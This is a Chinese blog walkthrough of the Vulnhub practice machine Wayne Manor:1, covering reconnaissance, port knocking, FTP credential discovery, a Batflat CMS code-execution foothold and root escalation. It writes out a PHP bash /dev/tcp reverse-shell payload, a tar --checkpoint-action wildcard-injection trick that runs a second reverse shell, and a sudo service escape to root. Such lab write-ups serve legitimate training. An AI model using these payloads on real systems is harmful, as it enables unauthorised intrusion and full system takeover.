首页 > 其他分享 >Vulnhub: Wayne Manor:1靶机

Vulnhub: Wayne Manor:1靶机

时间:2023-08-01 15:35:53浏览次数:42  
标签:Manor -- 192.168 sh 提权 Wayne Vulnhub root bash

kali:192.168.111.111

靶机:192.168.111.172

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.172

image

根据提示修改hosts文件

image

访问目标80,在主页发现三组数字,结合端口扫描的结果中21端口被过滤,猜测存在端口碰撞

image

knock -v 192.168.111.172 300 350 400

image

21号端口开放

image

查看ftp中的info.txt,提示账号密码:bruce | alfred_help_me

image

利用该账号密码可以登录网站后台

image

漏洞利用

该网站CMS存在远程代码执行

searchsploit batflat

image

修改用户信息

image

在用户Displayed name的输入框写入php代码,本地监听后保存,获得反弹shell

<?php system("bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'");?>

image

image

提权

利用pspy32收集到计划任务:https://github.com/DominicBreuker/pspy

image

查看/home/batman/.web/script.sh

image

tar压缩提权

echo 'bash -i >& /dev/tcp/192.168.111.111/5555 0>&1' > root.sh
chmod 777 root.sh
echo '' > "--checkpoint=1"
echo '' > "--checkpoint-action=exec=bash root.sh"

image

image

batman用户sudo权限

image

提权方法:https://gtfobins.github.io/gtfobins/service/#sudo

image

提升为root

sudo -u root service ../../bin/bash

image

flag

image

标签:Manor,--,192.168,sh,提权,Wayne,Vulnhub,root,bash
From: https://www.cnblogs.com/ctostm/p/17596647.html

相关文章

  • Vulnhub: shenron:3靶机
    kali:192.168.111.111靶机:192.168.111.171信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.171修改hosts后访问目标80端口,发现是wordpresswpscan收集目标用户,爆破出密码:iloverockyouwpscan--urlhttp://shenron/-euwpscan--urlhttp://......
  • Vulnhub: hacksudo: search靶机
    kali:192.168.111.111靶机:192.168.111.170信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.17080端口目录爆破feroxbuster-k-d1--urlhttp://192.168.111.170-w/opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lower......
  • Vulnhub: Coffee Addicts:1靶机
    kali:192.168.111.111靶机:192.168.111.158信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.158访问80端口提示添加域名到hosts文件目录爆破,发现wordpress目录feroxbuster-k-d1--urlhttp://coffeeaddicts.thm-w/opt/zidian/SecLists-2......
  • Vulnhub: HackathonCTF: 2靶机
    kali:192.168.111.111靶机:192.168.111.147信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.147ftp存在匿名登陆,其中存在字典文件80端口目录爆破feroxbuster-k-d1--urlhttp://192.168.111.147-w/opt/zidian/SecLists-2022.2/Discover......
  • Vulnhub之Dhanush靶机测试过程
    Dhanush识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/dhanush]└─$sudonetdiscover-ieth1-r192.168.187.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts......
  • Vulnhub: Hackable:II靶机
    kali:192.168.111.111靶机:192.168.111.142信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.142网站的files目录ftp存在匿名登录,所在目录为网站的files目录ftp上传反弹shell提权目标根目录下的.runme.shmd5解密后切换到shrek用户s......
  • vulnhub-BossPlayersCTF
    vulnhub-BossPlayersCTF目标IP:192.168.1.103官方难度:简单攻击机器:macOS+kali混搭信息收集端口扫描开放端口扫描nmap-sT-T4-p-192.168.1.103扫描结果StartingNmap7.93(https://nmap.org)at2023-06-0423:10CSTNmapscanreportfor192.168.1.103Hosti......
  • Vulnhub_Zico2_wp
    前言靶机下载地址:https://download.vulnhub.com/zico/zico2.ova主机探测nmap-sn192.168.20.0/24192.168.20.147为靶机ip详细信息扫描nmap-A-p-192.168.20.147点击查看扫描结果┌──(root㉿kali)-[/home/kali/Desktop]└─#nmap-A-p-192.168.20.147Starting......
  • Vulnhub_Acid_wp
    前言靶机下载地址:https://download.vulnhub.com/acid/Acid.rar靶机探测nmap-sn192.168.20.0/24192.168.20.146是新出现得ip所以为靶机ip详细信息扫描nmap-A-p-192.168.20.146漏洞扫描nmapnmap-p33447--script=vuln192.168.20.146niktonikto-h192.168.20.......
  • Vulnhub: EvilBox:One靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130secret目录爆破feroxbuster-k-d1--urlhttp://192.168.111.130/secret/-w/opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-li......